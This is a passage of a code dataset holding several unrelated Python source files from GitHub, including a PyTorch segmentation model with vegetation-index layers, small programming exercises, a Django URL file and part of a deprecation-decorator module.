= min_clip\n self.max_clip = max_clip\n \n def _min_max_normalize(self, x):\n return (x - self.min)/(self.max - self.min)\n \n def forward(self, x):\n if self.min_clip or self.max_clip:\n x = torch.clip(x, min=self.min_clip, max=self.max_clip)\n\n red_band, green_band, blue_band, nir_band = x[:, RED, :, :], x[:, GREEN, :, :], x[:, BLUE, :, :], x[:, NIR, :, :]\n nomin = self.alphas[0]*nir_band + self.alphas[1]*red_band + self.alphas[2]*green_band + self.alphas[3]*blue_band + self.alphas[4]\n denom = self.alphas[5]*nir_band + self.alphas[6]*red_band + self.alphas[7]*green_band + self.alphas[8]*blue_band + self.alphas[9]\n # index = nomin/(denom + self.epsilon)\n index = nomin/(torch.clamp(denom, min=self.epsilon))\n\n if self.max and self.min:\n index = self._min_max_normalize(index)\n\n index = index.unsqueeze(self.dim)\n # index = self.bn(index) # batch norm after non-linearity\n y = torch.cat((x, index), dim=self.dim)\n return y\n\nclass IndexTransforms(nn.Module):\n def __init__(self, args) -> None:\n super().__init__()\n self.transforms = []\n\n if args.NDVI:\n self.transforms.append(AppendGenericAgriculturalIndices(**channel_params[\"NDVI\"]))\n if args.gNDVI:\n self.transforms.append(AppendGenericAgriculturalIndices(**channel_params[\"gNDVI\"]))\n if args.SAVI:\n self.transforms.append(AppendGenericAgriculturalIndices(**channel_params[\"SAVI\"]))\n if args.RVI:\n self.transforms.append(AppendGenericAgriculturalIndices(**channel_params[\"RVI\"]))\n if args.DVI:\n self.transforms.append(AppendGenericAgriculturalIndices(**channel_params[\"DVI\"]))\n if args.VDVI:\n self.transforms.append(AppendGenericAgriculturalIndices(**channel_params[\"VDVI\"]))\n if args.GCC:\n self.transforms.append(AppendGenericAgriculturalIndices(**channel_params[\"GCC\"]))\n if args.EVI:\n self.transforms.append(AppendGenericAgriculturalIndices(**channel_params[\"EVI\"]))\n if args.VARI:\n self.transforms.append(AppendGenericAgriculturalIndices(**channel_params[\"VARI\"]))\n\n if args.GAI: #pass min, max, clip...\n self.transforms.append(AppendGenericAgriculturalIndices(alphas = args.GAI))\n if args.learn:\n for init_channel in args.learn:\n if init_channel == \"gaussian\":\n self.transforms.append(AppendGenericAgriculturalIndices(learn=True))\n else:\n self.transforms.append(AppendGenericAgriculturalIndices(**channel_params[init_channel], learn=True))\n\n \n self.number_of_transforms = len(self.transforms)\n self.index_transform = nn.Sequential(*self.transforms)\n\n def forward(self, x):\n return self.index_transform(x)\n\n\n\n \n\ndef load_model(args, name='MSCG-Rx50', classes=7, node_size=(32,32)):\n if name == 'MSCG-Rx50':\n net = rx50_gcn_3head_4channel(args=args, out_channels=classes)\n elif name == 'MSCG-Rx101':\n net = rx101_gcn_3head_4channel(args=args, out_channels=classes)\n else:\n print('not found the net')\n return -1\n\n return net\n\n\nclass rx50_gcn_3head_4channel(nn.Module):\n def __init__(self, args, out_channels=7, pretrained=True,\n nodes=(32, 32), dropout=0,\n enhance_diag=True, aux_pred=True):\n super(rx50_gcn_3head_4channel, self).__init__() # same with res_fdcs_v5\n\n self.aux_pred = aux_pred\n self.node_size = nodes\n self.num_cluster = out_channels\n\n resnet = se_resnext50_32x4d()\n\n self.index_transforms_layer = IndexTransforms(args)\n self.layer0, self.layer1, self.layer2, self.layer3, = \\\n resnet.layer0, resnet.layer1, resnet.layer2, resnet.layer3\n\n conv_in_channels = 4 + self.index_transforms_layer.number_of_transforms\n\n self.conv0 = torch.nn.Conv2d(conv_in_channels, 64, kernel_size=(7, 7), stride=(2, 2), padding=(3, 3), bias=False)\n\n for child in self.layer0.children():\n for param in child.parameters():\n par = param\n break\n break\n\n self.conv0.parameters = torch.cat([par[:, 0, :, :].unsqueeze(1), par], 1)\n self.layer0 = torch.nn.Sequential(self.conv0, *list(self.layer0)[1:4])\n\n self.graph_layers1 = GCN_Layer(1024, 128, bnorm=True, activation=nn.ReLU(True), dropout=dropout)\n\n self.graph_layers2 = GCN_Layer(128, out_channels, bnorm=False, activation=None)\n\n self.scg = SCG_block(in_ch=1024,\n hidden_ch=out_channels,\n node_size=nodes,\n add_diag=enhance_diag,\n dropout=dropout)\n\n weight_xavier_init(self.graph_layers1, self.graph_layers2, self.scg)\n\n def forward(self, x):\n # add prepocess channels\n\n x = self.index_transforms_layer(x)\n \n\n x_size = x.size()\n # for i, param in enumerate(self.layer0.parameters()):\n # print(f\"conv Parameter #{i} of shape {param.shape}:\\n{param.data}\\n\")\n\n gx = self.layer3(self.layer2(self.layer1(self.layer0(x))))\n gx90 = gx.permute(0, 1, 3, 2)\n gx180 = gx.flip(3)\n B, C, H, W = gx.size()\n\n A, gx, loss, z_hat = self.scg(gx)\n gx, _ = self.graph_layers2(\n self.graph_layers1((gx.reshape(B, -1, C), A))) # + gx.reshape(B, -1, C)\n if self.aux_pred:\n gx += z_hat\n gx = gx.reshape(B, self.num_cluster, self.node_size[0], self.node_size[1])\n\n A, gx90, loss2, z_hat = self.scg(gx90)\n gx90, _ = self.graph_layers2(\n self.graph_layers1((gx90.reshape(B, -1, C), A))) # + gx.reshape(B, -1, C)\n if self.aux_pred:\n gx90 += z_hat\n gx90 = gx90.reshape(B, self.num_cluster, self.node_size[1], self.node_size[0])\n gx90 = gx90.permute(0, 1, 3, 2)\n gx += gx90\n\n A, gx180, loss3, z_hat = self.scg(gx180)\n gx180, _ = self.graph_layers2(\n self.graph_layers1((gx180.reshape(B, -1, C), A))) # + gx.reshape(B, -1, C)\n if self.aux_pred:\n gx180 += z_hat\n gx180 = gx180.reshape(B, self.num_cluster, self.node_size[0], self.node_size[1])\n gx180 = gx180.flip(3)\n gx += gx180\n\n gx = F.interpolate(gx, (H, W), mode='bilinear', align_corners=False)\n\n if self.training:\n return F.interpolate(gx, x_size[2:], mode='bilinear', align_corners=False), loss + loss2 + loss3\n else:\n return F.interpolate(gx, x_size[2:], mode='bilinear', align_corners=False)\n\n\nclass rx101_gcn_3head_4channel(nn.Module):\n def __init__(self, args, out_channels=7, pretrained=True,\n nodes=(32, 32), dropout=0,\n enhance_diag=True, aux_pred=True):\n super(rx101_gcn_3head_4channel, self).__init__() # same with res_fdcs_v5\n\n self.aux_pred = aux_pred\n self.node_size = nodes\n self.num_cluster = out_channels\n\n resnet = se_resnext101_32x4d()\n self.index_transforms_layer = IndexTransforms(args)\n self.layer0, self.layer1, self.layer2, self.layer3, = \\\n resnet.layer0, resnet.layer1, resnet.layer2, resnet.layer3\n\n conv_in_channels = 4 + self.index_transforms_layer.number_of_transforms\n\n self.conv0 = torch.nn.Conv2d(conv_in_channels, 64, kernel_size=(7, 7), stride=(2, 2), padding=(3, 3), bias=False)\n\n for child in self.layer0.children():\n for param in child.parameters():\n par = param\n break\n break\n\n self.conv0.parameters = torch.cat([par[:, 0, :, :].unsqueeze(1), par], 1)\n self.layer0 = torch.nn.Sequential(self.conv0, *list(self.layer0)[1:4])\n\n self.graph_layers1 = GCN_Layer(1024, 128, bnorm=True, activation=nn.ReLU(True), dropout=dropout)\n\n self.graph_layers2 = GCN_Layer(128, out_channels, bnorm=False, activation=None)\n\n self.scg = SCG_block(in_ch=1024,\n hidden_ch=out_channels,\n node_size=nodes,\n add_diag=enhance_diag,\n dropout=dropout)\n\n weight_xavier_init(self.graph_layers1, self.graph_layers2, self.scg)\n\n def forward(self, x):\n x = self.index_transforms_layer(x)\n x_size = x.size()\n\n gx = self.layer3(self.layer2(self.layer1(self.layer0(x))))\n gx90 = gx.permute(0, 1, 3, 2)\n gx180 = gx.flip(3)\n\n B, C, H, W = gx.size()\n\n A, gx, loss, z_hat = self.scg(gx)\n\n gx, _ = self.graph_layers2(\n self.graph_layers1((gx.view(B, -1, C), A))) # + gx.reshape(B, -1, C)\n if self.aux_pred:\n gx += z_hat\n gx = gx.view(B, self.num_cluster, self.node_size[0], self.node_size[1])\n\n A, gx90, loss2, z_hat = self.scg(gx90)\n gx90, _ = self.graph_layers2(\n self.graph_layers1((gx90.view(B, -1, C), A))) # + gx.reshape(B, -1, C)\n if self.aux_pred:\n gx90 += z_hat\n gx90 = gx90.view(B, self.num_cluster, self.node_size[1], self.node_size[0])\n gx90 = gx90.permute(0, 1, 3, 2)\n gx += gx90\n\n A, gx180, loss3, z_hat = self.scg(gx180)\n gx180, _ = self.graph_layers2(\n self.graph_layers1((gx180.view(B, -1, C), A))) # + gx.reshape(B, -1, C)\n if self.aux_pred:\n gx180 += z_hat\n gx180 = gx180.view(B, self.num_cluster, self.node_size[0], self.node_size[1])\n gx180 = gx180.flip(3)\n gx += gx180\n\n gx = F.interpolate(gx, (H, W), mode='bilinear', align_corners=False)\n\n if self.training:\n return F.interpolate(gx, x_size[2:], mode='bilinear', align_corners=False), loss + loss2 + loss3\n else:\n return F.interpolate(gx, x_size[2:], mode='bilinear', align_corners=False)\n\n","repo_name":"ronbenc/Agrivision-project","sub_path":"src_Mor_Ron/MSCG-Net-master/tools/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":12369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"71469451188","text":"from operator import add, sub\n\n\nclass Vector:\n def __init__(self, *coords):\n self.coords = coords\n\n def __valid(self, other):\n if len(self.coords) != len(other.coords):\n raise TypeError('размерности векторов не совпадают')\n\n def __add__(self, other):\n self.__valid(other)\n return Vector(*(map(add, self.coords, other.coords)))\n\n def __sub__(self, other):\n self.__valid(other)\n return Vector(*(map(sub, self.coords, other.coords)))\n\n def get_coords(self):\n return self.coords\n\n\nclass VectorInt(Vector):\n def __init__(self, *coords):\n if len(tuple(filter(lambda x: isinstance(x, int), coords))) != len(coords):\n raise ValueError('координаты должны быть целыми числами')\n super().__init__(*coords)\n\n # def __add__(self, other):\n # _class = Vector if not isinstance(other, type(self)) else type(self)\n # return _class(*tuple(map(add, self.coords, other.coords)))\n\n def __add__(self, other):\n if not isinstance(other, type(self)):\n return super().__add__(other)\n return __class__(*tuple(map(add, self.coords, other.coords)))\n\n # def __sub__(self, other):\n # _class = Vector if not isinstance(other, type(self)) else type(self)\n # return _class(*tuple(map(add, self.coords, other.coords)))\n\n def __sub__(self, other):\n if not isinstance(other, type(self)):\n return super().__add__(other)\n return __class__(*tuple(map(add, self.coords, other.coords)))\n\n\n# Test:\nv1 = Vector(1, 2, 3)\nv2 = Vector(3, 4, 5)\n# print((v1 + v2).get_coords())\nassert (v1 + v2).get_coords() == (\n 4, 6, 8), \"операция сложения дала неверные значения (или некорректно работает метод get_coords)\"\nassert (v1 - v2).get_coords() == (\n -2, -2, -2), \"операция вычитания дала неверные значения (или некорректно работает метод get_coords)\"\n\nv = VectorInt(1, 2, 3, 4)\nassert isinstance(v, Vector), \"класс VectorInt должен наследоваться от класса Vector\"\n\ntry:\n v = VectorInt(1, 2, 3.4, 4)\nexcept ValueError:\n assert True\nelse:\n assert False, \"не сгенерировалось исключение ValueError для команды v = VectorInt(1, 2, 3.4, 4)\"\n\nv1 = VectorInt(1, 2, 3, 4)\nv2 = VectorInt(4, 2, 3, 4)\nv3 = Vector(1.0, 2, 3, 4)\n\nv = v1 + v2\nassert type(\n v) == VectorInt, \"при сложении вектором с целочисленными координатами должен формироваться объект класс�� VectorInt\"\nv = v1 + v3\nassert type(v) == Vector, \"при сложении вектором с вещественными координатами должен формироваться объект класса Vector\"\n","repo_name":"albert2126/StepikOOP","sub_path":"Part04/vector.py","file_name":"vector.py","file_ext":"py","file_size_in_byte":2963,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"30409594412","text":"from pytest import mark\n\n\nclass Solution:\n def min_remove_to_make_valid_parentheses(self, s: str) -> str:\n remove = []\n stack = []\n for i in range(len(s)):\n if s[i] == \"(\":\n stack.append(i)\n elif s[i] == \")\":\n if not stack:\n remove.append(i)\n else:\n stack.pop()\n remove.extend(stack)\n\n for j in range(len(remove)):\n s = s[: remove[j] - j] + s[remove[j] - j + 1 :]\n\n return s\n\n\nclass TestSolution:\n data_provider = [\n [\"((a)))\", \"((a))\"],\n [\"))((\", \"\"],\n [\"(()a(()\", \"()a()\"],\n ]\n\n @mark.parametrize(\"s, expected\", data_provider)\n def test_min_remove_to_make_valid_parentheses(self, s: str, expected: str):\n solution = Solution()\n assert solution.min_remove_to_make_valid_parentheses(s) == expected\n","repo_name":"Ariel-Yu/leetcode-pratices-and-tests","sub_path":"stack/test_1249_minimum_remove_to_make_valid_parentheses.py","file_name":"test_1249_minimum_remove_to_make_valid_parentheses.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"16715476969","text":"import matplotlib.pyplot as plt\nimport seaborn as sns\nfrom q36 import count_words\nsns.set(font='AppleGothic')\n\nlabel, y = [], []\nfor word, i in count_words.most_common(10):\n label.append(word)\n y.append(i)\nx = [i for i in range(10)]\nplt.bar(x, y, tick_label =label, align=\"center\")\nplt.ylabel(\"frequency\", fontsize=20)\nplt.show()","repo_name":"kuribayashi4/100knock","sub_path":"chapter04/q37.py","file_name":"q37.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"43658307092","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Oct 14 10:50:53 2018\n\n@author: 123\n\"\"\"\n\nimport sys\nfrom PyQt5 import QtGui, QtWidgets\n\ndef show_image(image_path='spyder.png'):\n app = QtWidgets.QApplication(sys.argv)\n pixmap = QtGui.QPixmap(image_path)\n screen = QtWidgets.QLabel() # The QLabel widget provides a text or image display. \n screen.setPixmap(pixmap)\n screen.showFullScreen()\n # sys.exit() 会抛出一个异常: SystemExit,如果这个异常没有被捕获,那么python解释器将会退出。如果有捕获该异常的代码,那么这些代码还是会执行。\n sys.exit(app.exec_())\n\n\nif __name__ == '__main__':\n show_image()","repo_name":"seed-fe/face_recognition_using_opencv_keras_scikit-learn","sub_path":"show_image.py","file_name":"show_image.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":60,"dataset":"github-code","pt":"94"} +{"seq_id":"72375679349","text":"\"\"\"\nPydantic models for configuring AFEP.\n\"\"\"\nfrom pathlib import Path\n\nfrom pydantic import BaseModel\n\n\nclass AfepRun(BaseModel):\n note_directories: list[Path] = None\n mml_format: str = None # default to json if not specified by MultiAfepConfig\n outdir: Path = None # should be assigned by parent; to alter name, use 'name'\n expand_cuis: bool = False\n apikey: str = None\n skip_greedy_algorithm: bool = False\n min_kb: int = None # default to ceiling(n_articles/2)\n max_kb: int = None\n data_directory: list[Path] = None\n name: str = None # for naming output directory\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n # post init\n if not self.name:\n self.name = self.data_directory[0].stem\n\n def set_outdir(self, default: Path):\n self.outdir = self.get_outdir(default)\n\n def set_note_directories(self, default: list[Path]):\n if not self.note_directories:\n self.note_directories = default\n\n def set_mml_format(self, default: str):\n if not self.mml_format:\n if default:\n self.mml_format = default\n else: # default to json if not otherwise specified\n self.mml_format = 'json'\n\n def get_outdir(self, default: Path):\n name = f'{self.name if self.name else self.note_directories[0].stem}' \\\n f'-selected{\"-cui-exp\" if self.expand_cuis else \"\"}'\n if default is None:\n return Path('.') / name\n elif self.name:\n return default / f'{self.name}-selected{\"-cui-exp\" if self.expand_cuis else \"\"}'\n else:\n return default / f'{self.note_directories[0].stem}-selected{\"-cui-exp\" if self.expand_cuis else \"\"}'\n\n def is_valid(self):\n assert self.note_directories is not None\n\n\nclass MultiAfepConfig(BaseModel):\n runs: list[AfepRun]\n outdir: Path = None # general output directory\n build_summary: bool = True\n base_directory: Path = None\n note_directories: list[Path] = None\n mml_format: str = None\n apikey: str = None\n expand_cuis: bool = False\n min_kb: int = None\n max_kb: int = None\n\n def __init__(self, **kw):\n super().__init__(**kw)\n # post init\n for run in self.runs:\n run.set_outdir(self.outdir)\n run.set_note_directories(self.note_directories)\n run.set_mml_format(self.mml_format)\n if self.expand_cuis or run.expand_cuis:\n run.apikey = self.apikey\n run.expand_cuis = True\n if self.min_kb and run.min_kb is None:\n run.min_kb = self.min_kb\n if self.max_kb and run.max_kb is None:\n run.max_kb = self.max_kb\n run.is_valid()\n","repo_name":"kpwhri/mml_utils","sub_path":"src/mml_utils/config/run_afep.py","file_name":"run_afep.py","file_ext":"py","file_size_in_byte":2762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"34017602651","text":"#-*- coding: utf -8 -*-\nimport logging\nimport multiprocessing\nimport os\nimport requests\nfrom bs4 import BeautifulSoup\n\nstopword = []\n\ndef get_stopword():\n\tglobal stopword\n\tread_stopword = open('stopword.txt', 'r')\n\twhile True:\n\t\tstr = read_stopword.readline()\n\t\tif str == '' :\n\t\t\tbreak\n\t\tstr = str.split('\\n')[0]\n\t\tstopword.append(str)\n\t\t\ndef LDA_format(fin, fout, num):\n\tfout.write(num.__str__() + '\\n')\n\twhile True:\n\t\tstr = fin.readline()\n\t\tif str == '':\n\t\t\tbreak\n\t\tfout.write(str)\n\t\ndef remove_note(str):\n\tcount = -1\n\tdot = False\n\twhile (count < len(str)-1):\n\t\tcount = count +1;\n\t\tif (ord(str[count]) >=97 and ord(str[count]) <= 122):\n\t\t\tcontinue\n\t\telif ord(str[count]) == 46:\n\t\t\tif not dot:\n\t\t\t\tstr = str.replace(str[count], ' . ')\n\t\t\t\tdot = True\n\t\t\tcontinue\n\t\telif (ord(str[count]) == 39 and ord(str[count-1]) >= 97 and ord(str[count-1]) <= 122 ):\n\t\t\tif count == len(str)-1:\n\t\t\t\tcontinue\n\t\t\telif (ord(str[count]) == 39 and ord(str[count+1]) >= 97 and ord(str[count+1]) <= 122 ):\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tstr = str.replace(str[count], ' ')\n\t\telse:\n\t\t\tstr = str.replace(str[count], ' ')\n\treturn str\n\ndef main():\n\topen_attraction_file=open('Attractions_eng2.txt','r')\n\twhile True:\n\t\tattraction_url = open_attraction_file.readline()\n\t\tif attraction_url == '':\n\t\t\tbreak\n\t\tcity = attraction_url.split('-')[3].split('.')[0]\n\t\tf = open('eng_data/' + city + '/eng_property_title_and_link.txt', 'r')\n\t\twhile True:\n\t\t\ttitle = f.readline() # title\n\t\t\tif title == '':\n\t\t\t\tbreak\n\t\t\ttitle = title.split('\\n')[0]\n\t\t\ttry:\n\t\t\t\topen_comment = open('eng_data/'+ city + '/' + title + '/' + title + '_all.txt', 'r')\n\t\t\texcept:\n\t\t\t\tcontinue\n\t\t\twrite_preprocess = open('eng_data/'+ city + '/' + title + '/' + title + '_preprocess.txt', 'w')\n\t\t\tdocument_count = 0\n\t\t\twhile True:\n\t\t\t\tstr = open_comment.readline()\n\t\t\t\tif str == '':\n\t\t\t\t\tbreak\n\t\t\t\tstr = str.lower() # 轉小寫\n\t\t\t\tstr = str.split('\\n')[0]\n\t\t\t\tstr = remove_note(str) # 移除標點符號\n\t\t\t\ttemp = str.split(' ') # 切空格,重組\n\t\t\t\t# 去除stopword\n\t\t\t\tfor item in stopword:\n\t\t\t\t\tfor word in temp:\n\t\t\t\t\t\tif word == item:\n\t\t\t\t\t\t\ttemp.remove(word)\n\t\t\t\t# 輸出至preprocess\n\t\t\t\tcheck_space = False\n\t\t\t\tfor word in temp:\n\t\t\t\t\tif word != '':\n\t\t\t\t\t\tif not check_space:\n\t\t\t\t\t\t\tcheck_space = True\n\t\t\t\t\t\t\twrite_preprocess.write(word)\n\t\t\t\t\t\telif word == '.':\n\t\t\t\t\t\t\twrite_preprocess.write('.')\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\twrite_preprocess.write(' ' + word)\n\t\t\t\twrite_preprocess.write('\\n')\n\t\t\t\tdocument_count = document_count + 1\n\t\t\tf.readline() # link\n\t\t\twrite_preprocess.close()\n\t\t\t# 增加文章數目\n\t\t\twrite_for_LDA = open('eng_data/' + city + '/' + title + '/' + title + '_LDA.txt', 'w')\n\t\t\topen_preprocess = open('eng_data/' + city + '/' + title + '/' + title + '_preprocess.txt', 'r')\n\t\t\tLDA_format(open_preprocess, write_for_LDA, document_count)\n\t\t\twrite_for_LDA.close()\n\t\t\topen_preprocess.close()\n\t\nif __name__ == '__main__':\n\tFORMAT = '%(asctime)s %(lineno)04d %(levelname)05s %(message)s'\n\tlogging.basicConfig(level=logging.DEBUG, filename='preprocess.log', format = FORMAT)\n\tget_stopword()\n\tmain()\n\t\n","repo_name":"a5135324/Crawler","sub_path":"preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":3051,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"31236153330","text":"def fatorial(n):\n \"\"\"calcula o fatorial de de um número\"\"\"\n fat = 1\n while n > 1:\n fat *= n\n n -= 1\n return fat\n\n\ndef epsilon(x):\n eps = 1.0 + x\n i = 2\n aprox = True\n while aprox:\n termo = (x ** i) / fatorial(i)\n eps += termo\n aprox = not abs(termo) < (x / 100)\n i += 1\n return eps\n\n\ndef get_exp(n):\n return 2.718281828459045 ** n\n\n\ndef main():\n for j in range(10):\n print(epsilon(float(j+1)), get_exp(j + 1))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Joaquim1302/usp-python","sub_path":"src/parte02/semana02/exerc_14_2_epsilon.py","file_name":"exerc_14_2_epsilon.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"42652830745","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Nov 27 12:24:19 2019\n\n@author: angelo\n\"\"\"\n\nfrom images import load, save\nfrom point import Rectangle, Square, Point\n\nblack = (0, 0, 0)\nwhite = (255, 255, 255)\nred = (255, 0, 0)\ngreen = (0, 255, 0)\nblue = (0, 0, 255)\namazon = (59, 122, 87)\n\n\nclass Image:\n \"\"\"The image class\"\"\"\n\n def __init__(self, height=640, length=480, background_color=white):\n self.imm = [[background_color] * length for _ in range(height)]\n self.length = length\n self.height = height\n self.background_color = background_color\n\n def __str__(self):\n return \"Image (h = {}, l = {}, background = {})\".format(\n self.height, self.length, self.background_color\n )\n\n def __repr__(self):\n return self.__str__()\n\n def draw_rectangle(self, rectangle, color):\n if not isinstance(rectangle, (Rectangle, Quadrato)):\n raise TypeError(\"Disegna rettangolo disegna rettangoli\")\n for y in range(rectangle.vertice_as.y, rectangle.vertice_bs.y + 1):\n for x in range(rectangle.vertice_as.x, rectangle.vertice_ad.x + 1):\n self.imm[y][x] = color\n\n def sava(self, nome_file):\n if type(nome_file) != str or not nome_file.endswith(\".png\"):\n raise TypeError(\"I can only save to file .png\")\n save(self.imm, file_name)\n\n def __add__(self, r):\n self.draw_rectangle(r, black)\n","repo_name":"edoardottt/programming-fundamentals","sub_path":"programming_lab/lab271119/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":1446,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"94"} +{"seq_id":"17814877147","text":"#!/usr/bin/env python3\nfrom heapq import heappush, heappop\n\nN, M, K, A, B = [int(x) for x in input().split()]\ngraph = [[] for _ in range(N)]\nfor i in range(M):\n a,b,c = [int(x) for x in input().split()]\n graph[a].append((c,b))\n\ndist = [1e18]*N\npq = [(0,A)]\ndist[A] = 0\nnimprov = [0]*N\nnegative_cycle = False\nwhile len(pq) > 0:\n d,i = heappop(pq)\n nimprov[i] += 1\n # Some extra for good measure, this is incorrect but might go though bad test data\n if nimprov[i] > 2*K+3:\n # In case of both having a negative cycle AND unreachable B,\n # unreachability takes precedence\n negative_cycle = True\n continue\n for c,j in graph[i]:\n if d+c >= dist[j]:\n continue\n dist[j] = d+c\n heappush(pq, (d+c, j))\nif dist[B] == 1e18:\n print(\"POSITIVE INFINITY\")\nelif negative_cycle:\n print(\"NEGATIVE INFINITY\")\nelse:\n print(dist[B])\n","repo_name":"ChalmersCodingClub/chalmerschallenge23-public","sub_path":"problems/negativegraph/submissions/wrong_answer/loke_superdijkstra.py","file_name":"loke_superdijkstra.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"24527239523","text":"from django.urls import path\r\nfrom . import views\r\n\r\n\r\nurlpatterns = [\r\n path('', views.index, name='index'),\r\n path('about/', views.about, name='about'),\r\n path('shop/', views.shop, name='shop'),\r\n path('contact/', views.contact, name='contact'),\r\n path('service/', views.service, name='service'),\r\n path('howtobuy/', views.howtobuy, name='howtobuy'),\r\n path('products/', views.products, name='products'),\r\n \r\n]","repo_name":"Saleemkk/ShoeShipping","sub_path":"shipping/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"9081117036","text":"\"\"\"Decorators for deprecating classes, functions and function parameters.\"\"\"\n\nfrom __future__ import annotations\n\n__all__ = [\"deprecated\", \"deprecated_params\"]\n\n\nimport inspect\nimport re\nfrom typing import Any, Callable, Iterable\n\nfrom decorator import decorate, decorator\n\nfrom .. import logger\n\n\ndef _get_callable_info(callable: Callable) -> tuple[str, str]:\n \"\"\"Returns type and name of a callable.\n\n Parameters\n ----------\n callable\n The callable\n\n Returns\n -------\n Tuple[str, str]\n The type and name of the callable. Type can can be one of \"class\", \"method\" (for\n functions defined in classes) or \"function\"). For methods, name is Class.method.\n \"\"\"\n what = type(callable).__name__\n name = callable.__qualname__\n if what == \"function\" and \".\" in name:\n what = \"method\"\n elif what != \"function\":\n what = \"class\"\n return (what, name)\n\n\ndef _deprecation_text_component(\n since: str | None,\n until: str | None,\n message: str,\n) -> str:\n \"\"\"Generates a text component used in deprecation messages.\n\n Parameters\n ----------\n since\n The version or date since deprecation\n until\n The version or date until removal of the deprecated callable\n message\n The reason for why the callable has been deprecated\n\n Returns\n -------\n str\n The deprecation message text component.\n \"\"\"\n since = f\"since {since} \" if since else \"\"\n until = (\n f\"is expected to be removed after {until}\"\n if until\n else \"may be removed in a later version\"\n )\n msg = \" \" + message if message else \"\"\n return f\"deprecated {since}and {until}.{msg}\"\n\n\ndef deprecated(\n func: Callable = None,\n since: str | None = None,\n until: str | None = None,\n replacement: str | None = None,\n message: str | None = \"\",\n) -> Callable:\n \"\"\"Decorator to mark a callable as deprecated.\n\n The decorated callable will cause a warning when used. The docstring of the\n deprecated callable is adjusted to indicate that this callable is deprecated.\n\n Parameters\n ----------\n func\n The function to be decorated. Should not be set by the user.\n since\n The version or date since deprecation.\n until\n The version or date until removal of the deprecated callable.\n replacement\n The identifier of the callable replacing the deprecated one.\n message\n The reason for why the callable has been deprecated.\n\n Returns\n -------\n Callable\n The decorated callable.\n\n Examples\n --------\n Basic usage::\n\n from manim.utils.deprecation import deprecated\n\n @deprecated\n def foo(**kwargs):\n pass\n\n @deprecated\n class Bar:\n def __init__(self):\n pass\n\n @deprecated\n def baz(self):\n pass\n\n foo()\n # WARNING The function foo has been deprecated and may be removed in a later version.\n\n a = Bar()\n # WARNING The class Bar has been deprecated and may be removed in a later version.\n\n a.baz()\n # WARNING The method Bar.baz has been deprecated and may be removed in a later version.\n\n You can specify additional information for a more precise warning::\n\n from manim.utils.deprecation import deprecated\n\n @deprecated(\n since=\"v0.2\",\n until=\"v0.4\",\n replacement=\"bar\",\n message=\"It is cooler.\"\n )\n def foo():\n pass\n\n foo()\n # WARNING The function foo has been deprecated since v0.2 and is expected to be removed after v0.4. Use bar instead. It is cooler.\n\n You may also use dates instead of versions::\n\n from manim.utils.deprecation import deprecated\n\n @deprecated(since=\"05/01/2021\", until=\"06/01/2021\")\n def foo():\n pass\n\n foo()\n # WARNING The function foo has been deprecated since 05/01/2021 and is expected to be removed after 06/01/2021.\n\n \"\"\"\n # If used as factory:\n if func is None:\n return lambda func: deprecated(func, since, until, replacement, message)\n\n what, name = _get_callable_info(func)\n\n def warning_msg(for_docs: bool = False) -> str:\n \"\"\"Generate the deprecation warning message.\n\n Parameters\n ----------\n for_docs\n Whether or not to format the message for use in documentation.\n\n Returns\n -------\n str\n The deprecation message.\n \"\"\"\n msg = message\n if replacement is not None:\n repl = replacement\n if for_docs:\n mapper = {\"class\": \"class\", \"method\": \"meth\", \"function\": \"func\"}\n repl = f\":{mapper[what]}:`~.{replacement}`\"\n msg = f\"Use {repl} instead.{' ' + message if message else ''}\"\n deprecated = _deprecation_text_component(since, until, msg)\n return f\"The {what} {name} has been {deprecated}\"\n\n def deprecate_docs(func: Callable):\n \"\"\"Adjust docstring to indicate the deprecation.\n\n Parameters\n ----------\n func\n The callable whose docstring to adjust.\n \"\"\"\n warning = warning_msg(True)\n doc_string = func.__doc__ or \"\"\n func.__doc__ = f\"{doc_string}\\n\\n.. attention:: Deprecated\\n {warning}\"\n\n def deprecate(func: Callable, *args, **kwargs):\n \"\"\"The actual decorator used to extend the callables behavior.\n\n Logs a warning message.\n\n Parameters\n ----------\n func\n The callable to decorate.\n args\n The arguments passed to the given callable.\n kwargs\n The keyword arguments passed to the given callable.\n\n Returns\n -------\n Any\n The return value of the given callable when being passed the given\n arguments.\n \"\"\"\n logger.warning(warning_msg())\n return func(*args, **kwargs)\n\n if type(func).__name__ != \"function\":\n deprecate_docs(func)\n func.__init__ = decorate(func.__init__, deprecate)\n return func\n\n func = decorate(func, deprecate)\n deprecate_docs(func)\n return func\n\n\ndef deprecated_params(\n params: str | Iterable[str] | None = None,\n since: str | None = None,\n until: str | None = None,\n message: str | None = \"\",\n redirections: None\n | (Iterable[tuple[str, str] | Callable[..., dict[str, Any]]]) = None,\n) -> 